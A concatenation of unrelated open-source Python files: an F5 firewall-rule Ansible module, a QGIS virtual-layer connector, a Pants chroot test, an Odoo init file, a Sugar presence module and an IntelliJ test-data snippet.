if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def exec_module(self):
changed = False
result = dict()
state = self.want.state
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.client.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def exists(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
resp = self.client.api.get(uri)
if resp.ok:
return True
return False
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the resource.")
return True
def create(self):
self._set_changed_options()
if self.want.rule_list is None and self.want.parent_rule_list is None:
if self.want.action is None:
self.changes.update({'action': 'reject'})
if self.want.logging is None:
self.changes.update({'logging': False})
if self.want.status is None:
self.changes.update({'status': 'enabled'})
if self.want.status == 'scheduled' and self.want.schedule is None:
raise F5ModuleError(
"A 'schedule' must be specified when 'status' is 'scheduled'."
)
if self.module.check_mode:
return True
self.create_on_device()
return True
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
params['placeAfter'] = 'last'
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
)
if self.changes.protocol not in ['icmp', 'icmpv6']:
if self.changes.icmp_message is not None:
raise F5ModuleError(
"The 'icmp_message' can only be specified when 'protocol' is 'icmp' or 'icmpv6'."
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def update_on_device(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
if self.have.protocol not in ['icmp', 'icmpv6'] and self.changes.protocol not in ['icmp', 'icmpv6']:
if self.changes.icmp_message is not None:
raise F5ModuleError(
"The 'icmp_message' can only be specified when 'protocol' is 'icmp' or 'icmpv6'."
)
if self.changes.protocol in ['icmp', 'icmpv6']:
self.changes.update({'source': {}})
self.changes.update({'destination': {}})
params = self.changes.api_params()
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def absent(self):
if self.exists():
return self.remove()
return False
def remove_from_device(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
resp = self.client.api.delete(uri)
if resp.status == 200:
return True
def read_current_from_device(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(required=True),
parent_policy=dict(),
parent_rule_list=dict(),
logging=dict(type='bool'),
protocol=dict(),
irule=dict(),
description=dict(),
source=dict(
type='list',
elements='dict',
options=dict(
address=dict(),
address_list=dict(),
address_range=dict(),
country=dict(),
port=dict(type='int'),
port_list=dict(),
port_range=dict(),
vlan=dict(),
),
mutually_exclusive=[[
'address', 'address_list', 'address_range', 'country', 'vlan',
'port', 'port_range', 'port_list'
]]
),
destination=dict(
type='list',
elements='dict',
options=dict(
address=dict(),
address_list=dict(),
address_range=dict(),
country=dict(),
port=dict(type='int'),
port_list=dict(),
port_range=dict(),
),
mutually_exclusive=[[
'address', 'address_list', 'address_range', 'country',
'port', 'port_range', 'port_list'
]]
),
action=dict(
choices=['accept', 'drop', 'reject', 'accept-decisively']
),
status=dict(
choices=['enabled', 'disabled', 'scheduled']
),
schedule=dict(),
rule_list=dict(),
icmp_message=dict(
type='list',
elements='dict',
options=dict(
type=dict(),
code=dict(),
)
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
),
state=dict(
default='present',
choices=['present', 'absent']
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
self.mutually_exclusive = [
['rule_list', 'action'],
['rule_list', 'source'],
['rule_list', 'destination'],
['rule_list', 'irule'],
['rule_list', 'protocol'],
['rule_list', 'logging'],
['parent_policy', 'parent_rule_list']
]
self.required_one_of = [
['parent_policy', 'parent_rule_list']
]
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
mutually_exclusive=spec.mutually_exclusive,
required_one_of=spec.required_one_of
)
try:
mm = ModuleManager(module=module)
results = mm.exec_module()
module.exit_json(**results)
except F5ModuleError as ex:
module.fail_json(msg=str(ex))
if __name__ == '__main__':
main()
|
paplorinc/intellij-community | refs/heads/master | python/testData/inspections/ConvertSingleQuotedDocstring.py | 83 | def foo():
<weak_warning descr="Triple double-quoted strings should be used for docstrings."><caret>'''</weak_warning>foo first line docstring
second line of docstring<weak_warning descr="Triple double-quoted strings should be used for docstrings.">'''</weak_warning>
pass |
ahuarte47/QGIS | refs/heads/master | python/plugins/db_manager/db_plugins/vlayers/connector.py | 19 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : Virtual layers plugin for DB Manager
Date : December 2015
copyright : (C) 2015 by Hugo Mercier
email : hugo dot mercier at oslandia dot com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from qgis.PyQt.QtCore import QUrl, QTemporaryFile
from ..connector import DBConnector
from ..plugin import Table
from qgis.core import (
QgsDataSourceUri,
QgsVirtualLayerDefinition,
QgsProject,
QgsMapLayerType,
QgsVectorLayer,
QgsCoordinateReferenceSystem,
QgsWkbTypes
)
import sqlite3
class sqlite3_connection(object):
def __init__(self, sqlite_file):
self.conn = sqlite3.connect(sqlite_file)
def __enter__(self):
return self.conn
def __exit__(self, type, value, traceback):
self.conn.close()
def getQueryGeometryName(sqlite_file):
# introspect the file
with sqlite3_connection(sqlite_file) as conn:
c = conn.cursor()
for r in c.execute("SELECT url FROM _meta"):
d = QgsVirtualLayerDefinition.fromUrl(QUrl(r[0]))
if d.hasDefinedGeometry():
return d.geometryField()
return None
def classFactory():
return VLayerConnector
# Tables in DB Manager are identified by their display names
# This global registry maps a display name with a layer id
# It is filled when getVectorTables is called
class VLayerRegistry(object):
_instance = None
@classmethod
def instance(cls):
if cls._instance is None:
cls._instance = VLayerRegistry()
return cls._instance
def __init__(self):
self.layers = {}
def reset(self):
self.layers = {}
def has(self, k):
return k in self.layers
def get(self, k):
return self.layers.get(k)
def __getitem__(self, k):
return self.get(k)
def set(self, k, l):
self.layers[k] = l
def __setitem__(self, k, l):
self.set(k, l)
def items(self):
return list(self.layers.items())
def getLayer(self, l):
lid = self.layers.get(l)
if lid is None:
return lid
if lid not in QgsProject.instance().mapLayers().keys():
self.layers.pop(l)
return None
return QgsProject.instance().mapLayer(lid)
class VLayerConnector(DBConnector):
def __init__(self, uri):
pass
def _execute(self, cursor, sql):
# This is only used to get list of fields
class DummyCursor(object):
def __init__(self, sql):
self.sql = sql
def close(self):
pass
return DummyCursor(sql)
def _get_cursor(self, name=None):
# fix_print_with_import
print(("_get_cursor_", name))
def _get_cursor_columns(self, c):
tf = QTemporaryFile()
tf.open()
tmp = tf.fileName()
tf.close()
df = QgsVirtualLayerDefinition()
df.setFilePath(tmp)
df.setQuery(c.sql)
p = QgsVectorLayer(df.toString(), "vv", "virtual")
if not p.isValid():
return []
f = [f.name() for f in p.fields()]
if p.geometryType() != QgsWkbTypes.NullGeometry:
gn = getQueryGeometryName(tmp)
if gn:
f += [gn]
return f
def uri(self):
return QgsDataSourceUri("qgis")
def getInfo(self):
return "info"
def getSpatialInfo(self):
return None
def hasSpatialSupport(self):
return True
def hasRasterSupport(self):
return False
def hasCustomQuerySupport(self):
return True
def hasTableColumnEditingSupport(self):
return False
def fieldTypes(self):
return [
"integer", "bigint", "smallint", # integers
"real", "double", "float", "numeric", # floats
"varchar", "varchar(255)", "character(20)", "text", # strings
"date", "datetime" # date/time
]
def getSchemas(self):
return None
def getTables(self, schema=None, add_sys_tables=False):
""" get list of tables """
return self.getVectorTables()
def getVectorTables(self, schema=None):
""" get list of table with a geometry column
it returns:
name (table name)
is_system_table
type = 'view' (is a view?)
geometry_column:
f_table_name (the table name in geometry_columns may be in a wrong case, use this to load the layer)
f_geometry_column
type
coord_dimension
srid
"""
reg = VLayerRegistry.instance()
VLayerRegistry.instance().reset()
lst = []
for _, l in QgsProject.instance().mapLayers().items():
if l.type() == QgsMapLayerType.VectorLayer:
lname = l.name()
# if there is already a layer with this name, use the layer id
# as name
if reg.has(lname):
lname = l.id()
VLayerRegistry.instance().set(lname, l.id())
geomType = None
dim = None
g = l.dataProvider().wkbType()
if g == QgsWkbTypes.Point:
geomType = 'POINT'
dim = 'XY'
elif g == QgsWkbTypes.LineString:
geomType = 'LINESTRING'
dim = 'XY'
elif g == QgsWkbTypes.Polygon:
geomType = 'POLYGON'
dim = 'XY'
elif g == QgsWkbTypes.MultiPoint:
geomType = 'MULTIPOINT'
dim = 'XY'
elif g == QgsWkbTypes.MultiLineString:
geomType = 'MULTILINESTRING'
dim = 'XY'
elif g == QgsWkbTypes.MultiPolygon:
geomType = 'MULTIPOLYGON'
dim = 'XY'
elif g == QgsWkbTypes.Point25D:
geomType = 'POINT'
dim = 'XYZ'
elif g == QgsWkbTypes.LineString25D:
geomType = 'LINESTRING'
dim = 'XYZ'
elif g == QgsWkbTypes.Polygon25D:
geomType = 'POLYGON'
dim = 'XYZ'
elif g == QgsWkbTypes.MultiPoint25D:
geomType = 'MULTIPOINT'
dim = 'XYZ'
elif g == QgsWkbTypes.MultiLineString25D:
geomType = 'MULTILINESTRING'
dim = 'XYZ'
elif g == QgsWkbTypes.MultiPolygon25D:
geomType = 'MULTIPOLYGON'
dim = 'XYZ'
lst.append(
(Table.VectorType, lname, False, False, l.id(), 'geometry', geomType, dim, l.crs().postgisSrid()))
return lst
def getRasterTables(self, schema=None):
return []
def getTableRowCount(self, table):
t = table[1]
l = VLayerRegistry.instance().getLayer(t)
if not l or not l.isValid():
return None
return l.featureCount()
def getTableFields(self, table):
""" return list of columns in table """
t = table[1]
l = VLayerRegistry.instance().getLayer(t)
if not l or not l.isValid():
return []
# id, name, type, nonnull, default, pk
n = l.dataProvider().fields().size()
f = [(i, f.name(), f.typeName(), False, None, False)
for i, f in enumerate(l.dataProvider().fields())]
f += [(n, "geometry", "geometry", False, None, False)]
return f
def getTableIndexes(self, table):
return []
def getTableConstraints(self, table):
return None
def getTableTriggers(self, table):
return []
def deleteTableTrigger(self, trigger, table=None):
return
def getTableExtent(self, table, geom):
is_id, t = table
if is_id:
l = QgsProject.instance().mapLayer(t)
else:
l = VLayerRegistry.instance().getLayer(t)
if not l or not l.isValid():
return None
e = l.extent()
r = (e.xMinimum(), e.yMinimum(), e.xMaximum(), e.yMaximum())
return r
def getViewDefinition(self, view):
print("**unimplemented** getViewDefinition")
def getSpatialRefInfo(self, srid):
crs = QgsCoordinateReferenceSystem(srid)
return crs.description()
def isVectorTable(self, table):
return True
def isRasterTable(self, table):
return False
def createTable(self, table, field_defs, pkey):
print("**unimplemented** createTable")
return False
def deleteTable(self, table):
print("**unimplemented** deleteTable")
return False
def emptyTable(self, table):
print("**unimplemented** emptyTable")
return False
def renameTable(self, table, new_table):
print("**unimplemented** renameTable")
return False
def moveTable(self, table, new_table, new_schema=None):
print("**unimplemented** moveTable")
return False
def createView(self, view, query):
print("**unimplemented** createView")
return False
def deleteView(self, view):
print("**unimplemented** deleteView")
return False
def renameView(self, view, new_name):
print("**unimplemented** renameView")
return False
def runVacuum(self):
print("**unimplemented** runVacuum")
return False
def addTableColumn(self, table, field_def):
print("**unimplemented** addTableColumn")
return False
def deleteTableColumn(self, table, column):
print("**unimplemented** deleteTableColumn")
def updateTableColumn(self, table, column, new_name, new_data_type=None, new_not_null=None, new_default=None, comment=None):
print("**unimplemented** updateTableColumn")
def renameTableColumn(self, table, column, new_name):
print("**unimplemented** renameTableColumn")
return False
def setColumnType(self, table, column, data_type):
print("**unimplemented** setColumnType")
return False
def setColumnDefault(self, table, column, default):
print("**unimplemented** setColumnDefault")
return False
def setColumnNull(self, table, column, is_null):
print("**unimplemented** setColumnNull")
return False
def isGeometryColumn(self, table, column):
print("**unimplemented** isGeometryColumn")
return False
def addGeometryColumn(self, table, geom_column='geometry', geom_type='POINT', srid=-1, dim=2):
print("**unimplemented** addGeometryColumn")
return False
def deleteGeometryColumn(self, table, geom_column):
print("**unimplemented** deleteGeometryColumn")
return False
def addTableUniqueConstraint(self, table, column):
print("**unimplemented** addTableUniqueConstraint")
return False
def deleteTableConstraint(self, table, constraint):
print("**unimplemented** deleteTableConstraint")
return False
def addTablePrimaryKey(self, table, column):
print("**unimplemented** addTablePrimaryKey")
return False
def createTableIndex(self, table, name, column, unique=False):
print("**unimplemented** createTableIndex")
return False
def deleteTableIndex(self, table, name):
print("**unimplemented** deleteTableIndex")
return False
def createSpatialIndex(self, table, geom_column='geometry'):
print("**unimplemented** createSpatialIndex")
return False
def deleteSpatialIndex(self, table, geom_column='geometry'):
print("**unimplemented** deleteSpatialIndex")
return False
def hasSpatialIndex(self, table, geom_column='geometry'):
print("**unimplemented** hasSpatialIndex")
return False
def execution_error_types(self):
print("**unimplemented** execution_error_types")
return False
def connection_error_types(self):
print("**unimplemented** connection_error_types")
return False
def getSqlDictionary(self):
from .sql_dictionary import getSqlDictionary
sql_dict = getSqlDictionary()
items = []
for tbl in self.getTables():
items.append(tbl[1]) # table name
for fld in self.getTableFields((None, tbl[1])):
items.append(fld[1]) # field name
sql_dict["identifier"] = items
return sql_dict
def getQueryBuilderDictionary(self):
from .sql_dictionary import getQueryBuilderDictionary
return getQueryBuilderDictionary()
|
dturner-tw/pants | refs/heads/master | tests/python/pants_test/backend/python/test_python_chroot.py | 2 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
import subprocess
from contextlib import contextmanager
from textwrap import dedent
from pex.pex_builder import PEXBuilder
from pex.platforms import Platform
from pants.backend.codegen.targets.python_antlr_library import PythonAntlrLibrary
from pants.backend.codegen.targets.python_thrift_library import PythonThriftLibrary
# TODO(John Sirois): XXX this dep needs to be fixed. All pants/java utility code needs to live
# in pants java since non-jvm backends depend on it to run things.
from pants.backend.jvm.subsystems.jvm import JVM
from pants.backend.python.interpreter_cache import PythonInterpreterCache
from pants.backend.python.python_chroot import PythonChroot
from pants.backend.python.python_requirement import PythonRequirement
from pants.backend.python.python_setup import PythonRepos, PythonSetup
from pants.backend.python.targets.python_binary import PythonBinary
from pants.backend.python.targets.python_library import PythonLibrary
from pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary
from pants.binaries.thrift_binary import ThriftBinary
from pants.ivy.bootstrapper import Bootstrapper
from pants.ivy.ivy_subsystem import IvySubsystem
from pants.source.source_root import SourceRootConfig
from pants.util.contextutil import temporary_dir
from pants_test.base_test import BaseTest
from pants_test.subsystem.subsystem_util import create_subsystem, subsystem_instance
def test_get_current_platform():
expected_platforms = [Platform.current(), 'linux-x86_64']
assert set(expected_platforms) == set(PythonChroot.get_platforms(['current', 'linux-x86_64']))
class PythonChrootTest(BaseTest):
def setUp(self):
# Capture PythonSetup with the real BUILD_ROOT before that is reset to a tmpdir by super.
with subsystem_instance(PythonSetup) as python_setup:
self.python_setup = python_setup
super(PythonChrootTest, self).setUp()
@contextmanager
def dumped_chroot(self, targets):
python_repos = create_subsystem(PythonRepos)
with subsystem_instance(IvySubsystem) as ivy_subsystem:
ivy_bootstrapper = Bootstrapper(ivy_subsystem=ivy_subsystem)
with subsystem_instance(ThriftBinary.Factory) as thrift_binary_factory:
interpreter_cache = PythonInterpreterCache(self.python_setup, python_repos)
interpreter_cache.setup()
interpreters = list(interpreter_cache.matched_interpreters([
self.python_setup.interpreter_requirement]))
self.assertGreater(len(interpreters), 0)
interpreter = interpreters[0]
with temporary_dir() as chroot:
pex_builder = PEXBuilder(path=chroot, interpreter=interpreter)
python_chroot = PythonChroot(python_setup=self.python_setup,
python_repos=python_repos,
ivy_bootstrapper=ivy_bootstrapper,
thrift_binary_factory=thrift_binary_factory.create,
interpreter=interpreter,
builder=pex_builder,
targets=targets,
platforms=['current'])
try:
python_chroot.dump()
yield pex_builder, python_chroot
finally:
python_chroot.delete()
def test_antlr(self):
self.create_file(relpath='src/antlr/word/word.g', contents=dedent("""
grammar word;
options {
language=Python;
output=AST;
}
WORD: ('a'..'z'|'A'..'Z'|'!')+;
word_up: WORD (' ' WORD)*;
"""))
antlr_target = self.make_target(spec='src/antlr/word',
target_type=PythonAntlrLibrary,
antlr_version='3.1.3',
sources=['word.g'],
module='word')
# TODO: see 3rdparty/python/BUILD
antlr3_requirement = PythonRequirement('antlr_python_runtime==3.1.3',
repository='http://www.antlr3.org/download/Python/')
antlr3 = self.make_target(spec='3rdparty/python:antlr3',
target_type=PythonRequirementLibrary,
requirements=[antlr3_requirement])
self.create_file(relpath='src/python/test/main.py', contents=dedent("""
import antlr3
from word import wordLexer, wordParser
def word_up():
input = 'Hello World!'
char_stream = antlr3.ANTLRStringStream(input)
lexer = wordLexer.wordLexer(char_stream)
tokens = antlr3.CommonTokenStream(lexer)
parser = wordParser.wordParser(tokens)
def print_node(node):
print(node.text)
visitor = antlr3.tree.TreeVisitor()
visitor.visit(parser.word_up().tree, pre_action=print_node)
"""))
binary = self.make_target(spec='src/python/test',
target_type=PythonBinary,
source='main.py',
dependencies=[antlr_target, antlr3])
# TODO(John Sirois): This hacks around a direct but undeclared dependency
# `pants.java.distribution.distribution.Distribution` gained in
# https://rbcommons.com/s/twitter/r/2657
# Remove this once proper Subsystem dependency chains are re-established.
with subsystem_instance(JVM):
# TODO(benjy): This hacks around PythonChroot's dependency on source roots.
# See do_test_thrift() for more details. Remove this when we have a better way.
with subsystem_instance(SourceRootConfig):
with self.dumped_chroot([binary]) as (pex_builder, python_chroot):
pex_builder.set_entry_point('test.main:word_up')
pex_builder.freeze()
pex = python_chroot.pex()
process = pex.run(blocking=False, stdout=subprocess.PIPE)
stdout, _ = process.communicate()
self.assertEqual(0, process.returncode)
self.assertEqual(['Hello', ' ', 'World!'], stdout.splitlines())
@contextmanager
def do_test_thrift(self, inspect_chroot=None):
# TODO(benjy): This hacks around PythonChroot's dependency on source roots.
# Most tests get SourceRoot functionality set up for them by their test context.
# However PythonChroot isn't a task and doesn't use context. Rather it accesses source roots
# directly via Target.target_base. Remove this when we have a better way.
with subsystem_instance(SourceRootConfig):
self.create_file(relpath='src/thrift/core/identifiers.thrift', contents=dedent("""
namespace py core
const string HELLO = "Hello"
const string WORLD = "World!"
"""))
core_const = self.make_target(spec='src/thrift/core',
target_type=PythonThriftLibrary,
sources=['identifiers.thrift'])
self.create_file(relpath='src/thrift/test/const.thrift', contents=dedent("""
namespace py test
include "core/identifiers.thrift"
const list<string> MESSAGE = [identifiers.HELLO, identifiers.WORLD]
"""))
test_const = self.make_target(spec='src/thrift/test',
target_type=PythonThriftLibrary,
sources=['const.thrift'],
dependencies=[core_const])
self.create_file(relpath='src/python/test/main.py', contents=dedent("""
from test.constants import MESSAGE
def say_hello():
print(' '.join(MESSAGE))
"""))
binary = self.make_target(spec='src/python/test',
target_type=PythonBinary,
source='main.py',
dependencies=[test_const])
yield binary, test_const
with self.dumped_chroot([binary]) as (pex_builder, python_chroot):
pex_builder.set_entry_point('test.main:say_hello')
pex_builder.freeze()
pex = python_chroot.pex()
process = pex.run(blocking=False, stdout=subprocess.PIPE)
stdout, _ = process.communicate()
self.assertEqual(0, process.returncode)
self.assertEqual('Hello World!', stdout.strip())
if inspect_chroot:
inspect_chroot(python_chroot)
def test_thrift(self):
with self.do_test_thrift():
pass # Run the test on a standard isolated pure python target graph.
def test_thrift_issues_1858(self):
# Confirm a synthetic target for our python_thrift_library from some upstream task does not
# trample the PythonChroot/PythonThriftBuilder generated code.
# In https://github.com/pantsbuild/pants/issues/1858 the ApacheThriftGen task in the 'gen'
# phase upstream of the 'binary' goal was injecting a synthetic python_library target owning
# thrift generated code _and_ that code was a subset of all the code generated by thrift; ie:
# there was a synthetic python_library being added directly to the chroot missing some thrift
# codegened '.py' files, leading to import of those files (and errors) instead of the
# PythonChroot/PythonThriftBuilder generated files (packaged as deps in the PythonChroot).
with self.do_test_thrift() as (binary, thrift_target):
self.create_file(relpath='.synthetic/test/python/__init__.py')
self.create_file(relpath='.synthetic/test/python/constants.py', contents=dedent("""
VALID_IDENTIFIERS = ['generated', 'by', 'upstream', 'and', 'different!']
"""))
synthetic_pythrift_codegen_target = self.make_target(spec='.synthetic/test/python:constants',
target_type=PythonLibrary,
sources=['__init__.py', 'constants.py'],
derived_from=thrift_target)
binary.inject_dependency(synthetic_pythrift_codegen_target.address)
def test_thrift_issues_2005(self):
# Issue #2005 highlighted the fact the PythonThriftBuilder was building both a given
# PythonThriftLibrary's thrift files as well as its transitive dependencies thrift files.
# We test here that the generated chroot only contains 1 copy of each thrift stub in the face
# of transitive thrift deps.
def inspect_chroot(python_chroot):
all_constants_files = set()
for root, _, files in os.walk(python_chroot.path()):
all_constants_files.update(os.path.join(root, f) for f in files if f == 'constants.py')
# If core/constants.py was included in test/ we'd have 2 copies of core/constants.py plus
# test/constants.py for a total of 3 constants.py files.
self.assertEqual(2, len(all_constants_files))
with self.do_test_thrift(inspect_chroot=inspect_chroot):
pass # Our test takes place in inspect_chroot above
|
moylop260/odoo-dev | refs/heads/master | addons/website_event/__init__.py | 1577 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import controllers
import models
|
godiard/sugar-toolkit-gtk3 | refs/heads/master | src/sugar3/presence/activity.py | 6 | # Copyright (C) 2007, Red Hat, Inc.
# Copyright (C) 2010 Collabora Ltd. <http://www.collabora.co.uk/>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
"""UI interface to an activity in the presence service
STABLE.
"""
import logging
from functools import partial
import dbus
from dbus import PROPERTIES_IFACE
from gi.repository import GObject
from telepathy.client import Channel
from telepathy.interfaces import CHANNEL, \
CHANNEL_INTERFACE_GROUP, \
CHANNEL_TYPE_TUBES, \
CHANNEL_TYPE_TEXT, \
CONNECTION, \
PROPERTIES_INTERFACE
from telepathy.constants import CHANNEL_GROUP_FLAG_CHANNEL_SPECIFIC_HANDLES, \
HANDLE_TYPE_ROOM, \
HANDLE_TYPE_CONTACT, \
PROPERTY_FLAG_WRITE
from sugar3.presence.buddy import Buddy
CONN_INTERFACE_ACTIVITY_PROPERTIES = 'org.laptop.Telepathy.ActivityProperties'
CONN_INTERFACE_BUDDY_INFO = 'org.laptop.Telepathy.BuddyInfo'
CONN_INTERFACE_ROOM_CONFIG = \
'org.freedesktop.Telepathy.Channel.Interface.RoomConfig1'
_logger = logging.getLogger('sugar3.presence.activity')
class Activity(GObject.GObject):
"""UI interface for an Activity in the presence service
Activities in the presence service represent your and other user's
shared activities.
Properties:
id
color
name
type
joined
"""
__gsignals__ = {
'buddy-joined': (GObject.SignalFlags.RUN_FIRST, None,
([GObject.TYPE_PYOBJECT])),
'buddy-left': (GObject.SignalFlags.RUN_FIRST, None,
([GObject.TYPE_PYOBJECT])),
'new-channel': (GObject.SignalFlags.RUN_FIRST, None,
([GObject.TYPE_PYOBJECT])),
'joined': (GObject.SignalFlags.RUN_FIRST, None,
([GObject.TYPE_PYOBJECT, GObject.TYPE_PYOBJECT])),
}
__gproperties__ = {
'id': (str, None, None, None, GObject.PARAM_READABLE),
'name': (str, None, None, None, GObject.PARAM_READWRITE),
'tags': (str, None, None, None, GObject.PARAM_READWRITE),
'color': (str, None, None, None, GObject.PARAM_READWRITE),
'type': (str, None, None, None, GObject.PARAM_READABLE),
'private': (bool, None, None, True, GObject.PARAM_READWRITE),
'joined': (bool, None, None, False, GObject.PARAM_READABLE),
}
def __init__(self, account_path, connection, room_handle=None,
properties=None):
if room_handle is None and properties is None:
raise ValueError('Need to pass one of room_handle or properties')
if properties is None:
properties = {}
GObject.GObject.__init__(self)
self._account_path = account_path
self.telepathy_conn = connection
self.telepathy_text_chan = None
self.telepathy_tubes_chan = None
self.room_handle = room_handle
self._join_command = None
self._share_command = None
self._id = properties.get('id', None)
self._color = properties.get('color', None)
self._name = properties.get('name', None)
self._type = properties.get('type', None)
self._tags = properties.get('tags', None)
self._private = properties.get('private', True)
self._joined = properties.get('joined', False)
self._channel_self_handle = None
self._text_channel_group_flags = 0
self._buddies = {}
self._joined_buddies = {}
self._get_properties_call = None
if self.room_handle is not None:
self._start_tracking_properties()
def _start_tracking_properties(self):
bus = dbus.SessionBus()
self._get_properties_call = bus.call_async(
self.telepathy_conn.requested_bus_name,
self.telepathy_conn.object_path,
CONN_INTERFACE_ACTIVITY_PROPERTIES,
'GetProperties',
'u',
(self.room_handle,),
reply_handler=self.__got_properties_cb,
error_handler=self.__error_handler_cb,
utf8_strings=True)
# As only one Activity instance is needed per activity process,
# we can afford listening to ActivityPropertiesChanged like this.
self.telepathy_conn.connect_to_signal(
'ActivityPropertiesChanged',
self.__activity_properties_changed_cb,
dbus_interface=CONN_INTERFACE_ACTIVITY_PROPERTIES)
def __activity_properties_changed_cb(self, room_handle, properties):
_logger.debug('%r: Activity properties changed to %r' % (self,
properties))
self._update_properties(properties)
def __got_properties_cb(self, properties):
_logger.debug('__got_properties_cb %r' % properties)
self._get_properties_call = None
self._update_properties(properties)
def __error_handler_cb(self, error):
_logger.debug('__error_handler_cb %r' % error)
def _update_properties(self, new_props):
val = new_props.get('name', self._name)
if isinstance(val, str) and val != self._name:
self._name = val
self.notify('name')
val = new_props.get('tags', self._tags)
if isinstance(val, str) and val != self._tags:
self._tags = val
self.notify('tags')
val = new_props.get('color', self._color)
if isinstance(val, str) and val != self._color:
self._color = val
